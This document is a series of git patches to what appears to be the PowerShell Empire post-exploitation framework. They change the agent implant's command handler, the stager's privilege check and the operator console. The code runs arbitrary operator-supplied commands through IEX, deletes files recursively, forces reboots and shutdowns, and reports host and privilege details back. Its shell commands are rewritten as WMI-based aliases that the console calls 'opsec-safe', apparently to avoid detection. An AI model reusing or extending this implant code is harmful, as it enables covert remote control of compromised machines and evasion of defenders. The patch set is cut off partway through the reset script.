From e68870f143eb2595c1a8fb9c19ee70fd4b5f7d95 Mon Sep 17 00:00:00 2001 From: Harmj0y Date: Wed, 19 Aug 2015 18:16:01 -0400 Subject: [PATCH 01/11] the following agent commands now use WMI instead of native binaries: ps, tasklist, ipconfig, ifconfig --- data/agent/agent.ps1 | 119 ++++++++++++++++++++++++++++--------------- 1 file changed, 79 insertions(+), 40 deletions(-) diff --git a/data/agent/agent.ps1 b/data/agent/agent.ps1 index 9119d80..1efaf90 100644 --- a/data/agent/agent.ps1 +++ b/data/agent/agent.ps1 @@ -315,57 +315,96 @@ function Invoke-Empire { mv { if ($cmdargs.length -ne ""){ $output = mv $cmdargs }} arp { $output = arp -a } netstat { $output = netstat -a } - ipconfig { $output = ipconfig -all } - ifconfig { $output = ipconfig -all } + ipconfig { + $output = Get-WmiObject -class "Win32_NetworkAdapterConfiguration" | ? {$_.IPEnabled -Match "True"} | % { + $out = New-Object psobject + $out | Add-Member Noteproperty 'Description' $_.Description + $out | Add-Member Noteproperty 'MACAddress' $_.MACAddress + $out | Add-Member Noteproperty 'DHCPEnabled' $_.DHCPEnabled + $out | Add-Member Noteproperty 'IPAddress' $($_.IPAddress -join ",") + $out | Add-Member Noteproperty 'IPSubnet' $($_.IPSubnet -join ",") + $out | Add-Member Noteproperty 'DefaultIPGateway' $($_.DefaultIPGateway -join ",") + $out | Add-Member Noteproperty 'DNSServer' $($_.DNSServerSearchOrder -join ",") + $out | Add-Member Noteproperty 'DNSHostName' $_.DNSHostName + $out | Add-Member Noteproperty 'DNSSuffix' $($_.DNSDomainSuffixSearchOrder -join ",") + $out + } | fl | Out-String | %{$_ + "`n"} + } + ifconfig { + $output = Get-WmiObject -class "Win32_NetworkAdapterConfiguration" | ? {$_.IPEnabled -Match "True"} | % { + $out = New-Object psobject + $out | Add-Member Noteproperty 'Description' $_.Description + $out | Add-Member Noteproperty 'MACAddress' $_.MACAddress + $out | Add-Member Noteproperty 'DHCPEnabled' $_.DHCPEnabled + $out | Add-Member Noteproperty 'IPAddress' $($_.IPAddress -join ",") + $out | Add-Member Noteproperty 'IPSubnet' $($_.IPSubnet -join ",") + $out | Add-Member Noteproperty 'DefaultIPGateway' $($_.DefaultIPGateway -join ",") + $out | Add-Member Noteproperty 'DNSServer' $($_.DNSServerSearchOrder -join ",") + $out | Add-Member Noteproperty 'DNSHostName' $_.DNSHostName + $out | Add-Member Noteproperty 'DNSSuffix' $($_.DNSDomainSuffixSearchOrder -join ",") + $out + } | fl | Out-String | %{$_ + "`n"} + } # this is stupid how complicated it is to get this information... ps { - if ($cmdargs.length -ne "") { - $output = tasklist /V /FO CSV | ConvertFrom-Csv | Where-Object {$_."Image Name" -match $cmdargs} | Select-Object -Property 'Image Name', 'PID', 'User Name', 'Mem Usage' - } - else { - $output = tasklist /V /FO CSV | ConvertFrom-Csv | ?{$_.'Image Name' -ne "tasklist.exe"} | Select-Object -Property 'Image Name', 'PID', 'User Name', 'Mem Usage' - } - if ([System.IntPtr]::Size -eq 4){ - # if we're running ps on an x86 architecture - $output = $output | % { - $process = Get-Process -Id $_.PID + $owners = @{} + gwmi win32_process | % {$o = $_.getowner(); if(-not $($o.User)){$o="N/A"} else {$o="$($o.Domain)\$($o.User)"}; $owners[$_.handle] = $o} + if($cmdargs -ne "") { $p = $cmdargs } + else{ $p = "*" } + $output = Get-Process $p | % { + $arch = "x64" + if ([System.IntPtr]::Size -eq 4){ $arch = "x86" - $out = New-Object psobject - $out | Add-Member Noteproperty 'ProcessName' $_.'Image Name' - $out | Add-Member Noteproperty 'PID' $_.PID - $out | Add-Member Noteproperty 'Arch' $arch - $out | Add-Member Noteproperty 'UserName' $_.'User Name' - $out | Add-Member Noteproperty 'MemUsage' $_.'Mem Usage' - $out - } | ft -wrap - } - else { - # otherwise we're x64 - $output = $output | % { - $process = Get-Process -Id $_.PID - $arch = "x64" - $modules = $process.modules - foreach($module in $process.modules) { + } + else{ + foreach($module in $_.modules) { if([System.IO.Path]::GetFileName($module.FileName).ToLower() -eq "wow64.dll") { $arch = "x86" break } } - $out = New-Object psobject - $out | Add-Member Noteproperty 'ProcessName' $_.'Image Name' - $out | Add-Member Noteproperty 'PID' $_.PID - $out | Add-Member Noteproperty 'Arch' $arch - $out | Add-Member Noteproperty 'UserName' $_.'User Name' - $out | Add-Member Noteproperty 'MemUsage' $_.'Mem Usage' - $out - } | ft -wrap - } + } + $out = New-Object psobject + $out | Add-Member Noteproperty 'ProcessName' $_.ProcessName + $out | Add-Member Noteproperty 'PID' $_.ID + $out | Add-Member Noteproperty 'Arch' $arch + $out | Add-Member Noteproperty 'UserName' $owners[$_.id.tostring()] + $mem = "{0:N2} MB" -f $($_.WS/1MB) + $out | Add-Member Noteproperty 'MemUsage' $mem + $out + } | Sort-Object -Property PID } - tasklist { $output = tasklist /V /FO CSV | ConvertFrom-Csv | Select-Object -Property 'Image Name', 'PID', 'Session Name', 'User Name', 'Mem Usage' | ft -wrap} + tasklist { + $owners = @{} + gwmi win32_process | % {$o = $_.getowner(); if(-not $($o.User)){$o="N/A"} else {$o="$($o.Domain)\$($o.User)"}; $owners[$_.handle] = $o} + if($cmdargs -ne "") { $p = $cmdargs } + else{ $p = "*" } + $output = Get-Process $p | % { + $arch = "x64" + if ([System.IntPtr]::Size -eq 4){ + $arch = "x86" + } + else{ + foreach($module in $_.modules) { + if([System.IO.Path]::GetFileName($module.FileName).ToLower() -eq "wow64.dll") { + $arch = "x86" + break + } + } + } + $out = New-Object psobject + $out | Add-Member Noteproperty 'ProcessName' $_.ProcessName + $out | Add-Member Noteproperty 'PID' $_.ID + $out | Add-Member Noteproperty 'Arch' $arch + $out | Add-Member Noteproperty 'UserName' $owners[$_.id.tostring()] + $mem = "{0:N2} MB" -f $($_.WS/1MB) + $out | Add-Member Noteproperty 'MemUsage' $mem + $out + } | Sort-Object -Property PID + } getpid { $output = [System.Diagnostics.Process]::GetCurrentProcess() | ft -wrap } - net { if ($cmdargs.length -ne ""){ $output = net $cmdargs }} route { if ($cmdargs.length -eq ""){ $output = route print } else { $output = route $cmdargs } @@ -380,7 +419,7 @@ function Invoke-Empire { else { $output = IEX "$cmd $cmdargs" } } } - "`n"+($output | format-table -wrap | out-string) + "`n"+($output | Format-Table -wrap | Out-String) } function Start-AgentJob { From 109fa29f60e2e345c3b099e6a9a3fe31bd56b073 Mon Sep 17 00:00:00 2001 From: Harmj0y Date: Wed, 19 Aug 2015 18:33:04 -0400 Subject: [PATCH 02/11] Combined code components for agent.ps1 shell command section. --- data/agent/agent.ps1 | 87 +++++--------------------------------------- 1 file changed, 10 insertions(+), 77 deletions(-) diff --git a/data/agent/agent.ps1 b/data/agent/agent.ps1 index 1efaf90..ff6d050 100644 --- a/data/agent/agent.ps1 +++ b/data/agent/agent.ps1 @@ -252,16 +252,8 @@ function Invoke-Empire { } $output = "" - switch ($cmd){ - ls { - if ($cmdargs.length -eq ""){ - $output = Get-ChildItem -force | select lastwritetime,length,name - } - else { - $output = Get-ChildItem -force -path $cmdargs | select lastwritetime,length,name - } - } - dir { + switch -regex ($cmd){ + '(ls|dir)' { if ($cmdargs.length -eq ""){ $output = Get-ChildItem -force | select lastwritetime,length,name } @@ -279,26 +271,15 @@ function Invoke-Empire { } } } - rm { + '(rm|del|rmdir)' { if ($cmdargs.length -ne ""){ try { - Remove-Item $cmdargs -ErrorAction Stop; + Remove-Item -Force -Recurse $cmdargs -ErrorAction Stop; $output = "$cmdargs deleted" } catch { $output=$_.Exception; - } - } - } - del { - if ($cmdargs.length -ne ""){ - try { - Remove-Item $cmdargs -ErrorAction Stop; - $output = "$cmdargs deleted" - } - catch { - $output=$_.Exception; - } + } } } pwd { $output = pwd } @@ -311,11 +292,10 @@ function Invoke-Empire { } } mkdir { if ($cmdargs.length -ne ""){ $output = mkdir $cmdargs }} - rmdir { if ($cmdargs.length -ne ""){ $output = rmdir $cmdargs }} mv { if ($cmdargs.length -ne ""){ $output = mv $cmdargs }} arp { $output = arp -a } netstat { $output = netstat -a } - ipconfig { + '(ipconfig|ifconfig)' { $output = Get-WmiObject -class "Win32_NetworkAdapterConfiguration" | ? {$_.IPEnabled -Match "True"} | % { $out = New-Object psobject $out | Add-Member Noteproperty 'Description' $_.Description @@ -330,24 +310,8 @@ function Invoke-Empire { $out } | fl | Out-String | %{$_ + "`n"} } - ifconfig { - $output = Get-WmiObject -class "Win32_NetworkAdapterConfiguration" | ? {$_.IPEnabled -Match "True"} | % { - $out = New-Object psobject - $out | Add-Member Noteproperty 'Description' $_.Description - $out | Add-Member Noteproperty 'MACAddress' $_.MACAddress - $out | Add-Member Noteproperty 'DHCPEnabled' $_.DHCPEnabled - $out | Add-Member Noteproperty 'IPAddress' $($_.IPAddress -join ",") - $out | Add-Member Noteproperty 'IPSubnet' $($_.IPSubnet -join ",") - $out | Add-Member Noteproperty 'DefaultIPGateway' $($_.DefaultIPGateway -join ",") - $out | Add-Member Noteproperty 'DNSServer' $($_.DNSServerSearchOrder -join ",") - $out | Add-Member Noteproperty 'DNSHostName' $_.DNSHostName - $out | Add-Member Noteproperty 'DNSSuffix' $($_.DNSDomainSuffixSearchOrder -join ",") - $out - } | fl | Out-String | %{$_ + "`n"} - } - # this is stupid how complicated it is to get this information... - ps { + '(ps|tasklist)' { $owners = @{} gwmi win32_process | % {$o = $_.getowner(); if(-not $($o.User)){$o="N/A"} else {$o="$($o.Domain)\$($o.User)"}; $owners[$_.handle] = $o} if($cmdargs -ne "") { $p = $cmdargs } @@ -375,44 +339,13 @@ function Invoke-Empire { $out } | Sort-Object -Property PID } - - tasklist { - $owners = @{} - gwmi win32_process | % {$o = $_.getowner(); if(-not $($o.User)){$o="N/A"} else {$o="$($o.Domain)\$($o.User)"}; $owners[$_.handle] = $o} - if($cmdargs -ne "") { $p = $cmdargs } - else{ $p = "*" } - $output = Get-Process $p | % { - $arch = "x64" - if ([System.IntPtr]::Size -eq 4){ - $arch = "x86" - } - else{ - foreach($module in $_.modules) { - if([System.IO.Path]::GetFileName($module.FileName).ToLower() -eq "wow64.dll") { - $arch = "x86" - break - } - } - } - $out = New-Object psobject - $out | Add-Member Noteproperty 'ProcessName' $_.ProcessName - $out | Add-Member Noteproperty 'PID' $_.ID - $out | Add-Member Noteproperty 'Arch' $arch - $out | Add-Member Noteproperty 'UserName' $owners[$_.id.tostring()] - $mem = "{0:N2} MB" -f $($_.WS/1MB) - $out | Add-Member Noteproperty 'MemUsage' $mem - $out - } | Sort-Object -Property PID - } - getpid { $output = [System.Diagnostics.Process]::GetCurrentProcess() | ft -wrap } + getpid { $output = [System.Diagnostics.Process]::GetCurrentProcess() } route { if ($cmdargs.length -eq ""){ $output = route print } else { $output = route $cmdargs } } - whoami { [Security.Principal.WindowsIdentity]::GetCurrent().Name | Out-String } - getuid { [Security.Principal.WindowsIdentity]::GetCurrent().Name | Out-String } - reboot { Restart-Computer -force } - restart { Restart-Computer -force } + '(whoami|getuid)' { [Security.Principal.WindowsIdentity]::GetCurrent().Name } + '(reboot|restart)' { Restart-Computer -force } shutdown { Stop-Computer -force } default { if ($cmdargs.length -eq ""){ $output = IEX $cmd } From ae741e2c857919f640e71f2e52e08fb3077e5bf3 Mon Sep 17 00:00:00 2001 From: Harmj0y Date: Wed, 19 Aug 2015 20:51:36 -0400 Subject: [PATCH 03/11] Implement agent route command in WMI. --- changelog | 1 + data/agent/agent.ps1 | 29 ++++++++++++++++++++++++++--- 2 files changed, 27 insertions(+), 3 deletions(-) diff --git a/changelog b/changelog index 91a08ac..10f62e4 100644 --- a/changelog +++ b/changelog @@ -4,6 +4,7 @@ -Added collection/packet_capture for netsh event tracing -Added management/zipfolder for native folder compression -Corrected menu behavior on agent exit, bug fix on some dir behavior +-Started porting native shell commands to WMI in the agent core ============ 8/16/2015 - RELEASE 1.1 diff --git a/data/agent/agent.ps1 b/data/agent/agent.ps1 index ff6d050..365858b 100644 --- a/data/agent/agent.ps1 +++ b/data/agent/agent.ps1 @@ -210,7 +210,7 @@ function Invoke-Empire { function Get-Sysinfo { $str = $Servers[$ServerIndex] $str += '|' + [Environment]::UserDomainName+'|'+[Environment]::UserName+'|'+[Environment]::MachineName; - $p = (gwmi Win32_NetworkAdapterConfiguration|Where{$_.IPAddress}|Select -Expand IPAddress); + $p = (Get-WmiObject Win32_NetworkAdapterConfiguration|Where{$_.IPAddress}|Select -Expand IPAddress); $str += '|' +@{$true=$p[0];$false=$p}[$p.Length -lt 6]; $str += '|' +(Get-WmiObject Win32_OperatingSystem).Name.split('|')[0]; # if we're SYSTEM, we're high integrity @@ -313,7 +313,7 @@ function Invoke-Empire { # this is stupid how complicated it is to get this information... '(ps|tasklist)' { $owners = @{} - gwmi win32_process | % {$o = $_.getowner(); if(-not $($o.User)){$o="N/A"} else {$o="$($o.Domain)\$($o.User)"}; $owners[$_.handle] = $o} + Get-WmiObject win32_process | % {$o = $_.getowner(); if(-not $($o.User)){$o="N/A"} else {$o="$($o.Domain)\$($o.User)"}; $owners[$_.handle] = $o} if($cmdargs -ne "") { $p = $cmdargs } else{ $p = "*" } $output = Get-Process $p | % { @@ -341,7 +341,30 @@ function Invoke-Empire { } getpid { $output = [System.Diagnostics.Process]::GetCurrentProcess() } route { - if ($cmdargs.length -eq ""){ $output = route print } + if (($cmdargs.length -eq "") -or ($cmdargs.lower() -eq "print")){ + # build a table of adapter interfaces indexes -> IP address for the adapater + $adapters = @{} + Get-WmiObject Win32_NetworkAdapterConfiguration | %{ $adapters[[int]($_.InterfaceIndex)] = $_.IPAddress } + $output = Get-WmiObject win32_IP4RouteTable | %{ + $out = New-Object psobject + $out | Add-Member Noteproperty 'Destination' $_.Destination + $out | Add-Member Noteproperty 'Netmask' $_.Mask + if ($_.NextHop -eq "0.0.0.0"){ + $out | Add-Member Noteproperty 'NextHop' "On-link" + } + else{ + $out | Add-Member Noteproperty 'NextHop' $_.NextHop + } + if($adapters[$_.InterfaceIndex] -and ($adapters[$_.InterfaceIndex] -ne "")){ + $out | Add-Member Noteproperty 'Interface' $($adapters[$_.InterfaceIndex] -join ",") + } + else { + $out | Add-Member Noteproperty 'Interface' '127.0.0.1' + } + $out | Add-Member Noteproperty 'Metric' $_.Metric1 + $out + } | ft -autosize | Out-String + } else { $output = route $cmdargs } } '(whoami|getuid)' { [Security.Principal.WindowsIdentity]::GetCurrent().Name } From fdfb0ba33797163b9bc0e5407f7ac959a22b0a7b Mon Sep 17 00:00:00 2001 From: Harmj0y Date: Wed, 19 Aug 2015 21:08:57 -0400 Subject: [PATCH 04/11] Removed "whoami" from the high integrity check. --- data/agent/agent.ps1 | 2 +- data/agent/stager.ps1 | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/data/agent/agent.ps1 b/data/agent/agent.ps1 index 365858b..fd48d8c 100644 --- a/data/agent/agent.ps1 +++ b/data/agent/agent.ps1 @@ -219,7 +219,7 @@ function Invoke-Empire { } else{ # otherwise check the groups - $str += '|'+($(whoami /groups) -join "").Contains("High Mandatory Level"); + $str += '|'+ ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") } $n = [System.Diagnostics.Process]::GetCurrentProcess(); $str += '|'+$n.ProcessName+'|'+$n.Id; diff --git a/data/agent/stager.ps1 b/data/agent/stager.ps1 index 1d42872..e7ae0e9 100644 --- a/data/agent/stager.ps1 +++ b/data/agent/stager.ps1 @@ -72,7 +72,7 @@ function Start-Negotiate{ # detect if we're SYSTEM or otherwise high-integrity if(([Environment]::UserName).ToLower() -eq "system"){$i+='|True'} - else{$i+='|'+($(whoami /groups) -join "").Contains("High Mandatory Level");} + else {$i += "|" +([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")} # get the current process name and ID $n=[System.Diagnostics.Process]::GetCurrentProcess(); From 39d974bb094482ff56ec168b99af395f656a0518 Mon Sep 17 00:00:00 2001 From: Harmj0y Date: Thu, 20 Aug 2015 14:35:42 -0400 Subject: [PATCH 05/11] Continued porting native shell commands to WMI replacents in agent core In agent menu, 'shell CMD' now runs straight IEX CMD, and 'help agentcmds' shows safe aliases Modified ./setup/reset.sh to work from parent or ./setup/ folders --- changelog | 6 + data/agent/agent.ps1 | 260 +++++++++++++++++++++++-------------------- lib/common/empire.py | 33 +++--- setup/reset.sh | 11 +- 4 files changed, 172 insertions(+), 138 deletions(-) diff --git a/changelog b/changelog index 10f62e4..b9ca12b 100644 --- a/changelog +++ b/changelog @@ -1,3 +1,9 @@ +8/20/2015 +--------- +-Continued porting native shell commands to WMI replacents in agent core +-In agent menu, 'shell CMD' now runs straight IEX CMD, and 'help agentcmds' shows safe aliases +-Modified ./setup/reset.sh to work from parent or ./setup/ folders + 8/19/2015 --------- -Added collection/netripper, port of the NetRipper project diff --git a/data/agent/agent.ps1 b/data/agent/agent.ps1 index fd48d8c..fdb04aa 100644 --- a/data/agent/agent.ps1 +++ b/data/agent/agent.ps1 @@ -239,140 +239,157 @@ function Invoke-Empire { function Invoke-ShellCommand { param($cmd, $cmdargs="") - # extract the command and arguments - $parts = $cmd.split(" ") - $cmd = $parts[0] - if ($parts.length -ne 1){ - $cmdargs = $parts[1..$parts.length] -join " " - # if this is a UNC path, forget the fancy formatting so we can get the stupid path to work - if ($cmdargs.contains("\\")){ - $cmdargs = $cmdargs.trim("`"").trim("'") - $cmdargs = "$cmdargs" - } + if ($cmdargs.StartsWith("\\")) { + # UNC path normalization for PowerShell + $cmdargs = "FileSystem::$cmdargs" } $output = "" - switch -regex ($cmd){ - '(ls|dir)' { - if ($cmdargs.length -eq ""){ - $output = Get-ChildItem -force | select lastwritetime,length,name - } - else { - try{ - if ($cmdargs.StartsWith("\\")) { - $output = Get-ChildItem -force -path "FileSystem::$cmdargs" -ErrorAction Stop | select lastwritetime,length,name - } - else { + if ($cmd.ToLower() -eq "shell") { + # if we have a straight 'shell' command, skip the aliases + if ($cmdargs.length -eq ""){ $output = "no shell command supplied" } + else { $output = IEX "$cmdargs" } + } + else { + switch -regex ($cmd) { + '(ls|dir)' { + if ($cmdargs.length -eq "") { + $output = Get-ChildItem -force | select lastwritetime,length,name + } + else { + try{ $output = Get-ChildItem -force -path "$cmdargs" -ErrorAction Stop | select lastwritetime,length,name } - } - catch [System.Management.Automation.ActionPreferenceStopException]{ - $output = "[!] Error: $_ (or cannot be accessed)." - } - } - } - '(rm|del|rmdir)' { - if ($cmdargs.length -ne ""){ - try { - Remove-Item -Force -Recurse $cmdargs -ErrorAction Stop; - $output = "$cmdargs deleted" - } - catch { - $output=$_.Exception; - } - } - } - pwd { $output = pwd } - cat { if ($cmdargs.length -ne ""){ $output = cat $cmdargs }} - cd { - if ($cmdargs.length -ne "") - { - cd $cmdargs - $output = pwd - } - } - mkdir { if ($cmdargs.length -ne ""){ $output = mkdir $cmdargs }} - mv { if ($cmdargs.length -ne ""){ $output = mv $cmdargs }} - arp { $output = arp -a } - netstat { $output = netstat -a } - '(ipconfig|ifconfig)' { - $output = Get-WmiObject -class "Win32_NetworkAdapterConfiguration" | ? {$_.IPEnabled -Match "True"} | % { - $out = New-Object psobject - $out | Add-Member Noteproperty 'Description' $_.Description - $out | Add-Member Noteproperty 'MACAddress' $_.MACAddress - $out | Add-Member Noteproperty 'DHCPEnabled' $_.DHCPEnabled - $out | Add-Member Noteproperty 'IPAddress' $($_.IPAddress -join ",") - $out | Add-Member Noteproperty 'IPSubnet' $($_.IPSubnet -join ",") - $out | Add-Member Noteproperty 'DefaultIPGateway' $($_.DefaultIPGateway -join ",") - $out | Add-Member Noteproperty 'DNSServer' $($_.DNSServerSearchOrder -join ",") - $out | Add-Member Noteproperty 'DNSHostName' $_.DNSHostName - $out | Add-Member Noteproperty 'DNSSuffix' $($_.DNSDomainSuffixSearchOrder -join ",") - $out - } | fl | Out-String | %{$_ + "`n"} - } - # this is stupid how complicated it is to get this information... - '(ps|tasklist)' { - $owners = @{} - Get-WmiObject win32_process | % {$o = $_.getowner(); if(-not $($o.User)){$o="N/A"} else {$o="$($o.Domain)\$($o.User)"}; $owners[$_.handle] = $o} - if($cmdargs -ne "") { $p = $cmdargs } - else{ $p = "*" } - $output = Get-Process $p | % { - $arch = "x64" - if ([System.IntPtr]::Size -eq 4){ - $arch = "x86" - } - else{ - foreach($module in $_.modules) { - if([System.IO.Path]::GetFileName($module.FileName).ToLower() -eq "wow64.dll") { - $arch = "x86" - break - } + catch [System.Management.Automation.ActionPreferenceStopException] { + $output = "[!] Error: $_ (or cannot be accessed)." } } - $out = New-Object psobject - $out | Add-Member Noteproperty 'ProcessName' $_.ProcessName - $out | Add-Member Noteproperty 'PID' $_.ID - $out | Add-Member Noteproperty 'Arch' $arch - $out | Add-Member Noteproperty 'UserName' $owners[$_.id.tostring()] - $mem = "{0:N2} MB" -f $($_.WS/1MB) - $out | Add-Member Noteproperty 'MemUsage' $mem - $out - } | Sort-Object -Property PID - } - getpid { $output = [System.Diagnostics.Process]::GetCurrentProcess() } - route { - if (($cmdargs.length -eq "") -or ($cmdargs.lower() -eq "print")){ - # build a table of adapter interfaces indexes -> IP address for the adapater - $adapters = @{} - Get-WmiObject Win32_NetworkAdapterConfiguration | %{ $adapters[[int]($_.InterfaceIndex)] = $_.IPAddress } - $output = Get-WmiObject win32_IP4RouteTable | %{ + } + '(rm|del|rmdir)' { + if ($cmdargs.length -ne "") { + try { + Remove-Item -Force -Recurse "$cmdargs" -ErrorAction Stop; + $output = "$cmdargs deleted" + } + catch { + $output=$_.Exception; + } + } + } + '(mv|move)' { + if ($cmdargs.length -ne "") { + try { + $parts = $cmdargs.split(" ") + $source = $parts[0..$($parts.length-2)] -join " " + $dest = $parts[-1] + Move-Item -LiteralPath $source -Destination $dest -Force -ErrorAction Stop + $output = "$source moved to $dest" + } + catch { + $output=$_.Exception; + } + } + } + '(copy|cp)' { + if ($cmdargs.length -ne "") { + try { + $parts = $cmdargs.split(" ") + $source = $parts[0..$($parts.length-2)] -join " " + $dest = $parts[-1] + Copy-Item -LiteralPath $source -Destination $dest -Force -ErrorAction Stop + $output = "$source copied to $dest" + } + catch { + $output=$_.Exception; + } + } + } + cd { + if ($cmdargs.length -ne "") + { + cd $cmdargs + $output = pwd + } + } + '(ipconfig|ifconfig)' { + $output = Get-WmiObject -class "Win32_NetworkAdapterConfiguration" | ? {$_.IPEnabled -Match "True"} | % { $out = New-Object psobject - $out | Add-Member Noteproperty 'Destination' $_.Destination - $out | Add-Member Noteproperty 'Netmask' $_.Mask - if ($_.NextHop -eq "0.0.0.0"){ - $out | Add-Member Noteproperty 'NextHop' "On-link" + $out | Add-Member Noteproperty 'Description' $_.Description + $out | Add-Member Noteproperty 'MACAddress' $_.MACAddress + $out | Add-Member Noteproperty 'DHCPEnabled' $_.DHCPEnabled + $out | Add-Member Noteproperty 'IPAddress' $($_.IPAddress -join ",") + $out | Add-Member Noteproperty 'IPSubnet' $($_.IPSubnet -join ",") + $out | Add-Member Noteproperty 'DefaultIPGateway' $($_.DefaultIPGateway -join ",") + $out | Add-Member Noteproperty 'DNSServer' $($_.DNSServerSearchOrder -join ",") + $out | Add-Member Noteproperty 'DNSHostName' $_.DNSHostName + $out | Add-Member Noteproperty 'DNSSuffix' $($_.DNSDomainSuffixSearchOrder -join ",") + $out + } | fl | Out-String | %{$_ + "`n"} + } + # this is stupid how complicated it is to get this information... + '(ps|tasklist)' { + $owners = @{} + Get-WmiObject win32_process | % {$o = $_.getowner(); if(-not $($o.User)){$o="N/A"} else {$o="$($o.Domain)\$($o.User)"}; $owners[$_.handle] = $o} + if($cmdargs -ne "") { $p = $cmdargs } + else{ $p = "*" } + $output = Get-Process $p | % { + $arch = "x64" + if ([System.IntPtr]::Size -eq 4){ + $arch = "x86" } else{ - $out | Add-Member Noteproperty 'NextHop' $_.NextHop + foreach($module in $_.modules) { + if([System.IO.Path]::GetFileName($module.FileName).ToLower() -eq "wow64.dll") { + $arch = "x86" + break + } + } } - if($adapters[$_.InterfaceIndex] -and ($adapters[$_.InterfaceIndex] -ne "")){ - $out | Add-Member Noteproperty 'Interface' $($adapters[$_.InterfaceIndex] -join ",") - } - else { - $out | Add-Member Noteproperty 'Interface' '127.0.0.1' - } - $out | Add-Member Noteproperty 'Metric' $_.Metric1 + $out = New-Object psobject + $out | Add-Member Noteproperty 'ProcessName' $_.ProcessName + $out | Add-Member Noteproperty 'PID' $_.ID + $out | Add-Member Noteproperty 'Arch' $arch + $out | Add-Member Noteproperty 'UserName' $owners[$_.id.tostring()] + $mem = "{0:N2} MB" -f $($_.WS/1MB) + $out | Add-Member Noteproperty 'MemUsage' $mem $out - } | ft -autosize | Out-String + } | Sort-Object -Property PID + } + getpid { $output = [System.Diagnostics.Process]::GetCurrentProcess() } + route { + if (($cmdargs.length -eq "") -or ($cmdargs.lower() -eq "print")){ + # build a table of adapter interfaces indexes -> IP address for the adapater + $adapters = @{} + Get-WmiObject Win32_NetworkAdapterConfiguration | %{ $adapters[[int]($_.InterfaceIndex)] = $_.IPAddress } + $output = Get-WmiObject win32_IP4RouteTable | %{ + $out = New-Object psobject + $out | Add-Member Noteproperty 'Destination' $_.Destination + $out | Add-Member Noteproperty 'Netmask' $_.Mask + if ($_.NextHop -eq "0.0.0.0"){ + $out | Add-Member Noteproperty 'NextHop' "On-link" + } + else{ + $out | Add-Member Noteproperty 'NextHop' $_.NextHop + } + if($adapters[$_.InterfaceIndex] -and ($adapters[$_.InterfaceIndex] -ne "")){ + $out | Add-Member Noteproperty 'Interface' $($adapters[$_.InterfaceIndex] -join ",") + } + else { + $out | Add-Member Noteproperty 'Interface' '127.0.0.1' + } + $out | Add-Member Noteproperty 'Metric' $_.Metric1 + $out + } | ft -autosize | Out-String + } + else { $output = route $cmdargs } + } + '(whoami|getuid)' { [Security.Principal.WindowsIdentity]::GetCurrent().Name } + '(reboot|restart)' { Restart-Computer -force } + shutdown { Stop-Computer -force } + default { + if ($cmdargs.length -eq ""){ $output = IEX $cmd } + else { $output = IEX "$cmd $cmdargs" } } - else { $output = route $cmdargs } - } - '(whoami|getuid)' { [Security.Principal.WindowsIdentity]::GetCurrent().Name } - '(reboot|restart)' { Restart-Computer -force } - shutdown { Stop-Computer -force } - default { - if ($cmdargs.length -eq ""){ $output = IEX $cmd } - else { $output = IEX "$cmd $cmdargs" } } } "`n"+($output | Format-Table -wrap | Out-String) @@ -700,7 +717,6 @@ function Invoke-Empire { Encode-Packet -type 40 -data "[*] File download of $path completed" } catch{ - # Write-Host "Error: $_" Encode-Packet -type 0 -data "file does not exist or cannot be accessed" } } diff --git a/lib/common/empire.py b/lib/common/empire.py index 7ad9263..24ae92b 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -1138,8 +1138,8 @@ class AgentMenu(cmd.Cmd): # set the text prompt self.prompt = '(Empire: '+helpers.color(name, 'red')+') > ' - # shell commands to tab complete - self.shellCmds = ["ls","dir","rm","del","pwd","cat","cd","mkdir","rmdir","mv","arp","netstat","ipconfig","ifconfig","net","route","reboot","restart","shutdown","ps","getpid","whoami", "getuid"] + # agent commands that have opsec-safe alises in the agent code + self.agentCommands = ["ls","dir","rm","del","cp","copy","pwd","cat","cd","mkdir","rmdir","mv","move","ipconfig","ifconfig","route","reboot","restart","shutdown","ps","tasklist","getpid","whoami","getuid"] # listen for messages from this specific agent dispatcher.connect( self.handle_agent_event, sender=dispatcher.Any) @@ -1193,14 +1193,17 @@ class AgentMenu(cmd.Cmd): parts = line.split(" ") if len(parts) > 0: - # check if we got a shell command - if parts[0] in self.shellCmds: + # check if we got an agent command + if parts[0] in self.agentCommands: shellcmd = " ".join(parts) # task the agent with this shell command self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_SHELL", shellcmd) # update the agent log - msg = "Tasked agent to run shell command " + line + msg = "Tasked agent to run command " + line self.mainMenu.agents.save_agent_log(self.sessionID, msg) + else: + print helpers.color("[!] Command not recognized.") + print helpers.color("[*] Use 'help' or 'help agentcmds' to see available commands.") def do_back(self, line): @@ -1213,6 +1216,16 @@ class AgentMenu(cmd.Cmd): raise StopIteration + def do_help(self, *args): + "Displays the help menu or syntax for particular commands." + + if args[0].lower() == "agentcmds": + print "\n" + helpers.color("[*] Available opsec-safe agent commands:\n") + print " " + messages.wrap_columns(", ".join(self.agentCommands), " ", width1=50, width2=10, indent=5) + "\n" + else: + cmd.Cmd.do_help(self, *args) + + def do_rename(self, line): "Rename the agent." @@ -1387,7 +1400,7 @@ class AgentMenu(cmd.Cmd): if line != "": # task the agent with this shell command - self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_SHELL", line) + self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_SHELL", "shell " + str(line)) # update the agent log msg = "Tasked agent to run shell command " + line self.mainMenu.agents.save_agent_log(self.sessionID, msg) @@ -1822,14 +1835,6 @@ class AgentMenu(cmd.Cmd): return [s[offs:] for s in ["kill"] if s.startswith(mline)] - def complete_shell(self, text, line, begidx, endidx): - "Tab-complete a shell command" - - mline = line.partition(' ')[2] - offs = len(mline) - len(text) - return [s[offs:] for s in self.shellCmds if s.startswith(mline)] - - def complete_scriptimport(self, text, line, begidx, endidx): "Tab-complete a PowerShell script path" diff --git a/setup/reset.sh b/setup/reset.sh index 3918c4e..9562da9 100755 --- a/setup/reset.sh +++ b/setup/reset.sh @@ -1,5 +1,12 @@ #!/bin/bash +IFS='/' read -a array <<< pwd + +if [[ "$(pwd)" != *setup ]] +then + cd ./setup +fi + # reset the database rm ../data/empire.db ./setup_database.py @@ -11,5 +18,5 @@ rm empire.debug # remove the download folders rm -rf ./downloads/ -# start up Empire in debug mode 